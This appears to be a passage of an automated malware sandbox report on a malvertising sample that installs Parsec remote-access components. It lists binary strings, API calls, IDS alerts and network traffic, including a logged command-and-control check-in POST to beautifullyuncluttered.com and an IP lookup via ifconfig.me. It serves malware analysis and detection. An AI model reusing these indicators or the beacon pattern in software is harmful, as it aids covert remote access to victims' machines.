Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 00000049.00000003.2474352730.000002868CACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000038.00000002.2444060898.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000038.00000003.2443146793.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000002.00000002.2291864507.000000000018C000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000036.00000003.2374772071.000002849F521000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 6_2_00F78318 FindFirstFileW,FindFirstFileW,free,6_2_00F78318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Code function: 13_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Code function: 13_2_00406873 FindFirstFileW,FindClose,13_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Code function: 13_2_0040290B FindFirstFileW,13_2_0040290B
Source: C:\Program Files\Parsec\pservice.exe Code function: 39_2_00007FF7CD04A89C FindFirstFileExW,39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Code function: 45_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,45_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Code function: 45_2_00406873 FindFirstFileW,FindClose,45_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Code function: 45_2_0040290B FindFirstFileW,45_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: 48_2_00007FF72C348EE4 FindFirstFileExW,48_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Code function: 51_2_00007FF7E5AD85E4 FindFirstFileExW,51_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Code function: 65_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,65_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Code function: 65_2_00406873 FindFirstFileW,FindClose,65_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Code function: 65_2_0040290B FindFirstFileW,65_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Code function: 71_2_00007FF6181985E4 FindFirstFileExW,71_2_00007FF6181985E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 6_2_00F79414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,6_2_00F79414

Networking

Source: Network traffic Suricata IDS: 2051091 - Severity 1 - ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: ifconfig.me
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 34.160.111.145:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49940 -> 104.18.0.181:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49709
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49912
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ifconfig.me
Source: global traffic HTTP traffic detected: POST /?CheckApp HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 158 Host: beautifullyuncluttered.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ifconfig.me
Source: global traffic DNS traffic detected: DNS query: beautifullyuncluttered.com
Source: unknown HTTP traffic detected: POST /?CheckApp HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 158 Host: beautifullyuncluttered.com
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crtKK
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/4g
Source: pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pservice.exe, 00000027.00000003.3138463049.000001F0112E3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287286552.000001F0112FE000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531406559.000001F0112F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287212937.000001F0112E8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlBy
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112C8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531443435.000001F0112D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
Source: pservice.exe, 00000027.00000003.2536923154.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2536642838.000001F011B06000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537335185.000001F011B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096
Source: pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
